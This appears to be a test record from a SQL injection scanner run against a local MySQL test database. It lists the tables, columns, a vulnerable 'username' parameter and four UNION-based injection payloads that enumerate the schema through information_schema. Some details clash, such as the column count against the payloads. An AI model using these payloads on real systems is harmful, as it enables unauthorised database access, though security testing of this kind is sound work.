


Test URL : http://localhost:3000/mysql
"Request type: POST"
{
  "dbEngine": "mysql",
  "dbName": "testdb",
  "table": [
    "table_test",
    "users"
  ],
  "columns": [
    {
      "tableName": "table_test",
      "columns": [
        "id",
        "emptything"
      ]
    },
    {
      "tableName": "users",
      "columns": [
        "id",
        "emptything"
      ]
    }
  ],
  "nbColumns": 3,
  "rows": [],
  "vulnerableParameters": [
    {
      "name": "username",
      "value": ""
    }
  ],
  "payloadsUsed": [
    "' UNION SELECT null, null, null, database() -- '",
    "' UNION SELECT null, null, null, table_name FROM information_schema.tables WHERE table_schema = 'testdb' -- ' ",
    "' UNION SELECT null, null, null, column_name FROM information_schema.columns WHERE table_name = 'table_test' -- '",
    "' UNION SELECT null, null, null, column_name FROM information_schema.columns WHERE table_name = 'table_test' -- 'users' -- '"
  ]
}
